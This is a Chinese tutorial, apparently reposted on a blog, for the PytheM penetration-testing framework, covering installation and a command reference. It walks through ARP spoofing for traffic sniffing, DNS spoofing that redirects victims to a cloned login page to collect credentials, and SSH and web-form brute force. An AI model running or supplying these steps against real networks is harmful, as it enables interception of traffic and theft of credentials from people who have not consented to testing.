PytheM是一個Python滲透測試框架。它只能在osnGNU/Linux OS系統(tǒng)上運行。

安裝$sudo apt-get update

$sudo apt-get install libasound-dev libjack-jackd2-dev portaudio19-dev python-pyaudio build-essential python-dev libnetfilter-queue-dev libespeak1 libffi-dev libssl-dev

$sudo git clone https://github.com/m4n3dw0lf/PytheM/

$cd PytheM

$sudo pip install -r requirements.txt

運行$sudo ./pythem

例子

ARP欺騙-HTTP中間人攻擊

命令：pythem> set interface

[+] Enter the interface: wlan0

pythem> set gateway

[+] Enter the gateway: 192.168.1.1

pythem> arpspoof start

[+] Setting the packet forwarding.

[+] Iptables redefined.

[+] ARP spoofing initialized.

pythem> sniff

[+] Enter the filter: http

ARP+DNS欺騙-重定向到偽造的頁面，收集登錄憑證

使用SET等克隆工具克隆你選中的網(wǎng)站，并部署在Apache2上

命令：pythem> set target

[+] Enter the target(s): 192.168.0.8

pythem> set interface wlan0

pythem> set gateway 192.168.0.1

pythem> arpspoof start

[+] Setting the packet forwarding.

[+] Iptables redefined.

[+] ARP spoofing initialized.

pythem> dnsspoof start

[+] Domain to be spoofed: www.google.com

[+] IP address to be redirected: 192.168.0.6

[+] DNS spoofing initialized.

pythem> sniff dns

SSH暴破-暴力破解pythem> service ssh start

pythem> set target

[+] Enter the target(s): 127.0.0.1

pythem> set file wordlist.txt

pythem> brute-force ssh

[+] Enter the username to bruteforce: anon123

Web頁面參數(shù)暴力破解

首先獲取web頁面登錄時的參數(shù)格式id= value

顯示重定向頁面，如果定向到一個不同的頁面則說明猜解正確。

命令pythem> set target http://127.0.0.1/

pythem> set file

[+] Enter the path to the file: wordlist.txt

pythem> brute-force webform

[+] Brute-Form authentication initialized.

[+] Enter the input id of the username box: vSIS_ID

[+] Enter the input id of the password box: vSIS_PASS

[+] Enter the username to brute-force the formulary: root

URL內容爆破pythem> set target

[+] Enter the target(s): http://testphp.vulnweb.com/index.php?id=

pythem> set file 1to100.txt

pythem> brute-force url

[+] Content URL bruter initialized.

功能

[ PytheM – Penetration Testing Framework v0.3.2 ]

help:打印幫助信息。

exit/quit:退出程序。

set:設置變量的值，參數(shù)：interface

gateway

target

file

arpmode例子:pythem> set interface | open input to set

或者pythem> set interface wlan0 | don't open input to set value

print:

打印變量的值，例子：pythem> print gateway

scan:

進行tcp/manualport/arp掃描.

(應該在設置完網(wǎng)卡和目標后再調用)例子:pythem> scan

或者pythem> scan tcp

arpspoof:

開始或結束arpspoofing攻擊. (使用rep或req可以設置arp欺騙的模式，rep表示欺騙響應，req表示欺騙請求)

參數(shù)start

stop

例子:arpspoof startarpspoof stop

dnsspoof:

開始dnsspoofing攻擊. (應該在arp欺騙攻擊開始后再調用)例子:pythem> dnsspoof startpythem> dnsspoof stop

sniff:

開始嗅探數(shù)據(jù)包(應該在設置網(wǎng)卡后再調用)例子:pythem> sniff http

或者pythem> sniff

[+] Enter the filter: port 1337 and host 10.0.1.5 | tcpdump like format or http,dns specific filter.

pforensic:

開始分析數(shù)據(jù)包(應該在設置完網(wǎng)卡和.pcap文件后調用)例子:pythem> pforensicpforensic> help

brute-force:

開始暴力破解攻擊(應該在設置完目標和字典文件路徑后調用)參數(shù):ssh | 目標是IP地址ip address as target

url | 目標是url (包含http://或https://)

webform | 目標是url (包含http://或https://)

例子:pythem> brute-force webformpythem> brute-force ssh

geoip:

顯示IP地址的大概位置(應該在設置目標(IP地址)后再調用)例子:pythem> geoip

或者pythem> geoip 8.8.8.8

decode and encode:

以選擇的模式解碼和編碼字符串，例子:pythem> decode base64pythem> encode ascii

cookiedecode:

解碼base64 url編碼的cookie的值，例子:pythem> cookiedecode

其它在控制臺可以執(zhí)行的命令，比如cd, ls, nano, cat 等。

Jarvis – 聲音控制助手[*] jarvis type jarvis-help to see the jarvis help page.

examples:

pythem> jarvis (以語音識別模式調用Jarvis)

pythem> jarvis-help (打印Jarvis幫助信息)

pythem> jarvis-log (檢查日志)

pythem> jarvis-log err (檢查錯誤日志)

pythem> jarvis-say (命令Jarvis說某些東西)

pythem> jarvis-say hello my name is jarvis.

pythem> jarvis-read (如果沒有指定文件，應該在設置文件后再調用)

pythem> jarvis-read file.txt

總結

以上是生活随笔為你收集整理的python 渗透框架_Python渗透测试框架：PytheM的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內容還不錯，歡迎將生活随笔推薦給好友。